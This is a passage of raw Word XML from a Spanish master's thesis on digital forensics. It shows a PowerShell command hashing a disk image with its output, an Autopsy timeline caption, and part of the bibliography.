          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E37E7" w14:textId="0C387F6E" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-FileHash .\Server_HDD.E01 -Algorithm SHA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093387BE" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BA7C8" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EB29F1" w14:textId="69CAEAB9" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDD7F6" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B4B295" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BB3DE" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Algorithm       Hash                                                                   Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8014A1" w14:textId="77777777" w:rsidR="00184E50" w:rsidRPr="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---------       ----                                                                   ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEC216B" w14:textId="77777777" w:rsidR="00184E50" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SHA1            3398F90D2438230AAAF7B5E8CE0A01E456D9CA10                               C:\Users\jrodg85\Desktop\Nuev...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495E863" w14:textId="5A7F339E" w:rsidR="00184E50" w:rsidRPr="00C9562B" w:rsidRDefault="00184E50" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9165CE" w14:textId="77777777" w:rsidR="00C4245F" w:rsidRDefault="00C4245F" w:rsidP="00D52A79">
      <w:pPr>
        <w:sectPr w:rsidR="00C4245F" w:rsidSect="00B93CA3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA83463" w14:textId="78FD5DD0" w:rsidR="00C4245F" w:rsidRPr="00C9562B" w:rsidRDefault="00C4245F" w:rsidP="00C4245F">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Ref155782459"/>
      <w:bookmarkStart w:id="208" w:name="_Toc155782546"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251895808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FF600EF" wp14:editId="223DF601">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>346454</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9524365" cy="10556875"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="39406384" name="Imagen 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6384" name="Imagen 2" descr="Escala de tiempo&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="9524365" cy="10556875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>XX</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>I.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detalle de línea del tiempo de Autopsy</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="282D4476" w14:textId="7B43F43A" w:rsidR="00C4245F" w:rsidRDefault="00C4245F" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7FDEDDF9" w14:textId="77777777" w:rsidR="00C4245F" w:rsidRDefault="00C4245F" w:rsidP="00D52A79">
      <w:pPr>
        <w:sectPr w:rsidR="00C4245F" w:rsidSect="00B93CA3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="16840" w:h="23808" w:code="8"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A41103" w14:textId="7FF1E4DA" w:rsidR="00BC275B" w:rsidRDefault="00BC275B" w:rsidP="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc155782547"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Biografía.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="72BF9DFF" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1867FCBC" w14:textId="77777777" w:rsidR="00770274" w:rsidRDefault="00770274" w:rsidP="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Ref155730947"/>
      <w:bookmarkStart w:id="211" w:name="_Ref155728868"/>
      <w:bookmarkStart w:id="212" w:name="_Toc155782548"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00BC275B">
        <w:t>I.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="0CABDA96" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00770274"/>
    <w:p w14:paraId="1E074C91" w14:textId="5C8F9DF6" w:rsidR="00520AAC" w:rsidRDefault="00BC275B" w:rsidP="00770274">
      <w:r w:rsidRPr="00BC275B">
        <w:t>Enunciado TFM</w:t>
      </w:r>
      <w:r w:rsidR="005670E5">
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="34F28730" w14:textId="11B42908" w:rsidR="00BC275B" w:rsidRDefault="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Universitat Oberta de Catalunya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573907BD" w14:textId="303AB2BF" w:rsidR="00BC275B" w:rsidRDefault="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Enunciado TFM - Análisis forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EACC8E" w14:textId="18177650" w:rsidR="00BC275B" w:rsidRDefault="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del Contenedor: Descripción del caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B636D4" w14:textId="14F552C6" w:rsidR="00BC275B" w:rsidRDefault="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId283" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1TOKWOF_akO6IKVvXJ9ovPxMMhd9kafy1/view</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162081F1" w14:textId="6AA4EC02" w:rsidR="00520AAC" w:rsidRDefault="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId284" w:history="1">
        <w:r w:rsidR="00810E29" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/001-ENUNCIADO-M1.881-TFM-ANALISIS-FORENSE-SISTEMAS-INFORMATICOS.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C8A63" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="4EFA4B44" w14:textId="774E95AD" w:rsidR="00BC275B" w:rsidRDefault="00770274" w:rsidP="00BC275B">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Ref155728901"/>
      <w:bookmarkStart w:id="214" w:name="_Toc155782549"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00BC275B">
        <w:t>II.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="26F23101" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00D52A79"/>
    <w:p w14:paraId="5D51A8E3" w14:textId="37ED5567" w:rsidR="00520AAC" w:rsidRDefault="00770274" w:rsidP="00D52A79">
      <w:r w:rsidRPr="00770274">
        <w:t>Propuestas de TFM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC47FA" w14:textId="2AA8FE3C" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Universitat Oberta de Catalunya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48623A74" w14:textId="0E753FDE" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: M1.881 - Análisi</w:t>
      </w:r>
      <w:r w:rsidR="005D0BE7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B695F0F" w14:textId="1E3CAC08" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del Contenedor: Descripción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470CA5F" w14:textId="5EA68998" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId285" w:anchor="gid=0" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://docs.google.com/spreadsheets/d/16JGkkrY4fiPN32RAfdpVuLJBZrnewscpmuTelbe3X_o/edit#gid=0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1B2C7" w14:textId="397C4869" w:rsidR="00520AAC" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="005D0BE7">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId286" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/002-PROPUESTA-TFM-EXCEL.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF78F3" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="06D6976A" w14:textId="2717C738" w:rsidR="005670E5" w:rsidRDefault="00770274" w:rsidP="005670E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Ref155731518"/>
      <w:bookmarkStart w:id="216" w:name="_Toc155782550"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005670E5">
        <w:t>III.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="4929AEDB" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00D52A79"/>
    <w:p w14:paraId="01C58413" w14:textId="344EAC03" w:rsidR="00520AAC" w:rsidRDefault="005D0BE7" w:rsidP="00D52A79">
      <w:r w:rsidRPr="005D0BE7">
        <w:t>El método Reagan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394800FB" w14:textId="2D5FC932" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: GEFIRA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A626C" w14:textId="1A57D993" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: El método Reagan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2589C17B" w14:textId="3D346EF5" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId287" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.xn--elespaoldigital-3qb.com/el-metodo-reagan/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543DDD1" w14:textId="77777777" w:rsidR="005670E5" w:rsidRDefault="005670E5" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1E5A446F" w14:textId="080023CE" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A3D14" w14:textId="5F25D123" w:rsidR="005670E5" w:rsidRDefault="005D0BE7" w:rsidP="005670E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Ref155731606"/>
      <w:bookmarkStart w:id="218" w:name="_Toc155782551"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005670E5">
        <w:t>IV.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w14:paraId="316511B0" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7BF348BC" w14:textId="48D513CA" w:rsidR="005670E5" w:rsidRDefault="005D0BE7" w:rsidP="00D52A79">
      <w:r w:rsidRPr="005670E5">
        <w:t>Norma ISO 27037:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D21AA2" w14:textId="769220AD" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: International Organization for Standardization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254ADD2" w14:textId="7EF41CD0" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Information technology — Security techniques — Guidelines for identification, collection, acquisition, and preservation of digital evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059CF329" w14:textId="2A681B3E" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId288" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.amnafzar.net/files/1/ISO%2027000/ISO%20IEC%2027037-2012.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D1552" w14:textId="791AAEBC" w:rsidR="005670E5" w:rsidRDefault="005670E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId289" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/003-ISOIEC-27037-2012.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C1F13B" w14:textId="77777777" w:rsidR="005670E5" w:rsidRDefault="005670E5" w:rsidP="005670E5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A33ED7" w14:textId="3BBFDB8F" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Ref155731707"/>
      <w:bookmarkStart w:id="220" w:name="_Toc155782552"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00591474">
        <w:t>V.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="5D5ACDE6" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="005670E5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6E042E" w14:textId="0D645698" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="005670E5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00591474">
        <w:t>mplementación de herramientas para la extracción de evidencia digital</w:t>
      </w:r>
      <w:r w:rsidRPr="005670E5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396ED99A" w14:textId="08F07472" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Autor: ANTHONY ALEXANDER GUZMÁN MOLINA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9EAF60" w14:textId="2E8E9107" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: IMPLEMENTACIÓN DE HERRAMIENTAS PARA LA EXTRACCIÓN DE EVIDENCIA DIGITAL .</w:t>
      </w:r>
